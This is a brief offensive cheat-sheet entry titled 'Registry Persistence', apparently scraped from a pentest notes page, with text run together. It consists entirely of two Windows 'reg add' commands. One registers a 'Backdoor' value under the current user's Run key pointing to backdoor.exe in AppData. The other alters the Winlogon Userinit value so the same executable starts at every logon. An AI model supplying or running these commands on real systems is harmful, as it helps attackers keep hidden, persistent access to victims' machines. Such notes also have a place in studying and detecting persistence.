Registry Persistence
'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' . "C:\Users\%username%\AppData\Roaming\"1) Cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\%username%\AppData\Roaming\backdoor.exe"reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\Users\Administrator\AppData\Roaming\backdoor.exe" /fLast updated